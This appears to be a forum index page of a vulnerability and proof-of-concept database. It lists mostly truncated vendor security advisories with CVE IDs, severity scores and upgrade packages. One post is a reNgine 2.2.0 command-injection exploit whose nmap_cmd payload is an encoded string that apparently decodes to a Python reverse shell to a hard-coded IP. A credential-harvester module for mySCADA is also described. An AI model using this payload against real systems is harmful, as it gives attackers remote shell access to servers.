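?day POC Vulnerability Database
A POC vulnerability database containing all CVEs, POCs and ?days published across the web in recent years. It can be connected to the ishack vulnerability scanner through an API; some vulnerabilities are visible to members only.
45,352 topics in this forum
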
Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Severity 6 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 02/11/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Microsoft Windows: CVE-2025-21418: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability Solution(s) microsoft-windows-windows_10-1507-kb5052040 microsoft-windows-windows_10-1607-kb5052006 microsoft-windows-windows_10-1809-kb5052000 microsoft-windows-windows_10-21h2-kb5051974 microsoft-windows-windows_10-22h2-kb5051974 microsoft-windows-windows_11-22h2-kb50…
- 0 replies
- 48 views

Ubuntu: USN-6021-1 (CVE-2023-1534): Chromium vulnerabilities Severity 9 CVSS (AV:N/AC:M/Au:N/C:C/I:C/A:C) Published 03/21/2023 Created 05/05/2023 Added 04/17/2023 Modified 01/28/2025 Description Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) Solution(s) ubuntu-upgrade-chromium-browser References https://attackerkb.com/topics/cve-2023-1534 CVE - 2023-1534 USN-6021-1
- 0 replies
- 48 views

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…
- 0 replies
- 47 views

FreeBSD: VID-68958E18-ED94-11ED-9688-B42E991FC52E (CVE-2023-28852): glpi -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:M/C:P/I:P/A:N) Published 03/20/2023 Created 05/17/2023 Added 05/16/2023 Modified 01/28/2025 Description GLPI is a free asset and IT management software package. Starting in version 9.5.0 and prior to versions 9.5.13 and 10.0.7, a user with dashboard administration rights may hack the dashboard form to store malicious code that will be executed when other users will use the related dashboard. Versions 9.5.13 and 10.0.7 contain a patch for this issue. Solution(s) freebsd-upgrade-package-glpi Refe…
- 0 replies
- 47 views

Alma Linux: CVE-2025-1016: Important: firefox security update (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Memory safety bugs present in Firefox 134, Thunderbird 134, Firefox ESR 115.19, Firefox ESR 128.6, Thunderbird 115.19, and Thunderbird 128.6. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 135, Firefox ESR < 115.20, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird <…
- 0 replies
- 47 views

Ivanti Pulse Connect Secure: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs) Severity 4 CVSS (AV:L/AC:L/Au:M/C:C/I:N/A:N) Published 02/11/2025 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Cleartext storage of information in Ivanti Connect Secure before version 22.7R2.6 and Ivanti Policy Secure before version 22.7R1.3 allows a local unauthenticated attacker to read sensitive data. Solution(s) pulse-secure-pulse-connect-secure-upgrade-22_7r2_6 References https://attackerkb.com/topics/cve-2024-13843 CVE - 2024-13843…
- 0 replies
- 47 views

Ivanti Pulse Connect Secure: February Security Advisory Ivanti Connect Secure (ICS),Ivanti Policy Secure (IPS) and Ivanti Secure Access Client (ISAC) (Multiple CVEs) Severity 6 CVSS (AV:L/AC:L/Au:S/C:N/I:C/A:C) Published 02/11/2025 Created 02/13/2025 Added 02/12/2025 Modified 02/12/2025 Description Insufficient permissions in Ivanti Secure Access Client before version 22.8R1 allows a local authenticated attacker to delete arbitrary files. Solution(s) pulse-secure-pulse-connect-secure-upgrade-22_8r1 References https://attackerkb.com/topics/cve-2024-13813 CVE - 2024-13813 https://forums.ivanti.com/s/article/February-Security…
- 0 replies
- 47 views

FreeBSD: VID-79B1F4EE-860A-11EF-B2DC-CBCCBF25B7EA: gitea -- token missing access control for packages Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 10/06/2024 Created 10/12/2024 Added 10/11/2024 Modified 10/11/2024 Description Problem Description: Fix bug when a token is given public only Solution(s) freebsd-upgrade-package-gitea
- 0 replies
- 47 views

Amazon Linux AMI 2: CVE-2023-52772: Security patch for kernel (ALASKERNEL-5.15-2024-033) Severity 7 CVSS (AV:L/AC:L/Au:S/C:C/I:C/A:C) Published 05/21/2024 Created 12/13/2024 Added 12/12/2024 Modified 01/28/2025 Description In the Linux kernel, the following vulnerability has been resolved: af_unix: fix use-after-free in unix_stream_read_actor() syzbot reported the following crash [1] After releasing unix socket lock, u->oob_skb can be changed by another thread. We must temporarily increase skb refcount to make sure this other thread will not free the skb under us. [1] BUG: KASAN: slab-use-after-free in unix_stream_read_actor+0xa7/0xc0 net/…
- 0 replies
- 47 views

FreeBSD: VID-68958E18-ED94-11ED-9688-B42E991FC52E (CVE-2023-28636): glpi -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:M/C:P/I:P/A:N) Published 03/20/2023 Created 05/17/2023 Added 05/16/2023 Modified 01/28/2025 Description GLPI is a free asset and IT management software package. Starting in version 0.60 and prior to versions 9.5.13 and 10.0.7, a vulnerability allows an administrator to create a malicious external link. This issue is fixed in versions 9.5.13 and 10.0.7. Solution(s) freebsd-upgrade-package-glpi References CVE-2023-28636
- 0 replies
- 46 views

Oracle Linux: CVE-2023-27533: ELSA-2023-6679:curl security update (MODERATE) (Multiple Advisories) Severity 5 CVSS (AV:N/AC:L/Au:N/C:N/I:P/A:N) Published 03/20/2023 Created 07/26/2024 Added 07/22/2024 Modified 11/22/2024 Description A vulnerability in input validation exists in curl <8.0 during communication using the TELNET protocol may allow an attacker to pass on maliciously crafted user name and "telnet options" during server negotiation. The lack of proper input scrubbing allows an attacker to send content or perform option negotiation without the application's intent. This vulnerability could be exploited if a…
- 0 replies
- 46 views

MFSA2025-07 Firefox: Security Vulnerabilities fixed in Firefox 135 (CVE-2025-1013) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/05/2025 Added 02/05/2025 Modified 02/06/2025 Description A race condition could have led to private browsing tabs being opened in normal browsing windows. This could have resulted in a potential privacy leak. This vulnerability affects Firefox < 135, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird < 135. Solution(s) mozilla-firefox-upgrade-135_0 References https://attackerkb.com/topics/cve-2025-1013 CVE - 2025-1013 http://www.mozilla.org/sec…
- 0 replies
- 46 views

Debian: CVE-2025-0510: thunderbird -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/11/2025 Added 02/10/2025 Modified 02/10/2025 Description Thunderbird displayed an incorrect sender address if the From field of an email used the invalid group name syntax that is described in CVE-2024-49040. This vulnerability affects Thunderbird < 128.7 and Thunderbird < 135. Solution(s) debian-upgrade-thunderbird References https://attackerkb.com/topics/cve-2025-0510 CVE - 2025-0510 DLA-4045-1 DSA-5861-1
- 0 replies
- 46 views

Ubuntu: (Multiple Advisories) (CVE-2023-28617): Emacs vulnerability Severity 7 CVSS (AV:L/AC:M/Au:N/C:C/I:C/A:C) Published 03/19/2023 Created 05/05/2023 Added 04/10/2023 Modified 01/28/2025 Description org-babel-execute:latex in ob-latex.el in Org Mode through 9.6.1 for GNU Emacs allows attackers to execute arbitrary commands via a file name or directory name that contains shell metacharacters. Solution(s) ubuntu-pro-upgrade-emacs ubuntu-pro-upgrade-emacs-bin-common ubuntu-pro-upgrade-emacs-common ubuntu-pro-upgrade-emacs-el ubuntu-pro-upgrade-emacs24 ubuntu-pro-upgrade-emacs24-bin-common ubuntu-pro-upgrade-emacs24-common ubuntu-pro…
- 0 replies
- 45 views

mySCADA myPRO Manager Credential Harvester (CVE-2025-24865 and CVE-2025-22896) Disclosed 02/13/2025 Created 02/25/2025 Description Credential Harvester in MyPRO Manager <= v1.3 from mySCADA. The product suffers from a broken authentication vulnerability (CVE-2025-24865) for certain functions. One of them is the configuration page for notifications, which returns the cleartext credentials (CVE-2025-22896) before correctly verifying that the associated request is coming from an authenticated and authorized entity. Author(s) Michael Heinzl Platform Windows Architectures cmd Development Source Code History
- 0 replies
- 45 views

Alma Linux: CVE-2025-1014: Important: firefox security update (Multiple Advisories) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/12/2025 Added 02/11/2025 Modified 02/13/2025 Description Certificate length was not properly checked when added to a certificate store. In practice only trusted data was processed. This vulnerability affects Firefox < 135, Firefox ESR < 128.7, Thunderbird < 128.7, and Thunderbird < 135. Solution(s) alma-upgrade-firefox alma-upgrade-firefox-x11 alma-upgrade-thunderbird References https://attackerkb.com/topics/cve-2025-1014 CVE - 2025-1014 https://erra…
- 0 replies
- 45 views

MFSA2025-11 Thunderbird: Security Vulnerabilities fixed in Thunderbird 135 (CVE-2025-0510) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/04/2025 Created 02/05/2025 Added 02/05/2025 Modified 02/14/2025 Description Thunderbird displayed an incorrect sender address if the From field of an email used the invalid group name syntax that is described in CVE-2024-49040. This vulnerability affects Thunderbird < 128.7 and Thunderbird < 135. Solution(s) mozilla-thunderbird-upgrade-135_0 References https://attackerkb.com/topics/cve-2025-0510 CVE - 2025-0510 http://www.mozilla.org/security/announce/2025/mfsa2025-11…
- 0 replies
- 44 views

FreeBSD: VID-D598266D-7772-4A31-9594-83B76B1FB837 (CVE-2024-36293): Intel CPUs -- multiple vulnerabilities Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/11/2025 Created 02/15/2025 Added 02/13/2025 Modified 02/13/2025 Description Improper access control in the EDECCSSA user leaf function for some Intel(R) Processors with Intel(R) SGX may allow an authenticated user to potentially enable denial of service via local access. Solution(s) freebsd-upgrade-package-cpu-microcode-intel References CVE-2024-36293
- 0 replies
- 44 views

Oracle Linux: CVE-2025-1015: ELSA-2025-1184:thunderbird security update (IMPORTANT) (Multiple Advisories) Severity 6 CVSS (AV:N/AC:L/Au:N/C:P/I:P/A:N) Published 02/04/2025 Created 02/12/2025 Added 02/10/2025 Modified 02/13/2025 Description The Thunderbird Address Book URI fields contained unsanitized links. This could be used by an attacker to create and export an address book containing a malicious payload in a field. For example, in the “Other” field of the Instant Messaging section. If another user imported the address book, clicking on the link could result in opening a web page inside Thunderbird, and that page could execute (unprivileged) Java…
- 0 replies
- 44 views

Adobe Illustrator: CVE-2025-21163: Security updates available for Adobe Illustrator (APSB25-11) Severity 7 CVSS (AV:L/AC:L/Au:N/C:C/I:C/A:C) Published 02/11/2025 Created 02/14/2025 Added 02/12/2025 Modified 02/12/2025 Description Adobe has released an update for Adobe Illustrator. This update resolves critical vulnerabilities that could lead to arbitrary code execution. Adobe is not aware of any exploits in the wild for any of the issues addressed in these updates. Solution(s) adobe-illustrator-upgrade-latest References https://attackerkb.com/topics/cve-2025-21163 CVE - 2025-21163 https://helpx.adobe.com/security/products/…
- 0 replies
- 44 views

SUSE: CVE-2024-36922: SUSE Linux Security Advisory Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 05/30/2024 Created 06/24/2024 Added 06/24/2024 Modified 08/28/2024 Description In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: read txq->read_ptr under lock If we read txq->read_ptr without lock, we can read the same value twice, then obtain the lock, and reclaim from there to two different places, but crucially reclaim the same entry twice, resulting in the WARN_ONCE() a little later. Fix that by reading txq->read_ptr under lock. Solution(s) suse-upgrade-cluster-md-kmp-64kb suse-upg…
- 0 replies
- 44 views

FreeBSD: VID-A4F8BB03-F52F-11ED-9859-080027083A05 (CVE-2023-28322): curl -- multiple vulnerabilities Severity 4 CVSS (AV:N/AC:M/Au:N/C:P/I:N/A:N) Published 03/21/2023 Created 05/23/2023 Added 05/20/2023 Modified 01/28/2025 Description Details for this vulnerability have not been published by NIST at this point. Descriptions from software vendor advisories for this issue are provided below. From VID-A4F8BB03-F52F-11ED-9859-080027083A05: Wei Chong Tan, Harry Sintonen, and Hiroki Kurosawa reports: This update fixes 4 security vulnerabilities: Medium CVE-2023-28319: UAF in SSH sha256 fingerprint check. Reported by Wei Chong Tan on 202…
- 0 replies
- 44 views

Amazon Linux AMI 2: CVE-2024-12705: Security patch for bind (ALAS-2025-2751) Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 01/29/2025 Created 02/05/2025 Added 02/05/2025 Modified 02/05/2025 Description Clients using DNS-over-HTTPS (DoH) can exhaust a DNS resolver's CPU and/or memory by flooding it with crafted valid or invalid HTTP/2 traffic. This issue affects BIND 9 versions 9.18.0 through 9.18.32, 9.20.0 through 9.20.4, 9.21.0 through 9.21.3, and 9.18.11-S1 through 9.18.32-S1. Solution(s) amazon-linux-ami-2-upgrade-bind amazon-linux-ami-2-upgrade-bind-chroot amazon-linux-ami-2-upgrade-bind-debuginfo amazon-linux-ami-2-up…
- 0 replies
- 44 views

Red Hat: CVE-2023-28164: CVE-2023-28164 Mozilla: URL being dragged from a removed cross-origin iframe into the same tab triggered navigation (Multiple Advisories) Severity 7 CVSS (AV:N/AC:M/Au:N/C:N/I:C/A:N) Published 03/20/2023 Created 03/22/2023 Added 03/21/2023 Modified 01/28/2025 Description Dragging a URL from a cross-origin iframe that was removed during the drag could have led to user confusion and website spoofing attacks. This vulnerability affects Firefox < 111, Firefox ESR < 102.9, and Thunderbird < 102.9. Solution(s) redhat-upgrade-firefox redhat-upgrade-firefox-debuginfo redhat-upgrade-firefox-debugsource redha…
- 0 replies
- 43 views

SUSE: CVE-2025-22865: SUSE Linux Security Advisory Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 01/28/2025 Created 01/31/2025 Added 01/30/2025 Modified 02/12/2025 Description Using ParsePKCS1PrivateKey to parse a RSA key that is missing the CRT values would panic when verifying that the key is well formed. Solution(s) suse-upgrade-go1-24 suse-upgrade-go1-24-doc suse-upgrade-go1-24-race suse-upgrade-govulncheck-vulndb References https://attackerkb.com/topics/cve-2025-22865 CVE - 2025-22865
- 0 replies
- 43 views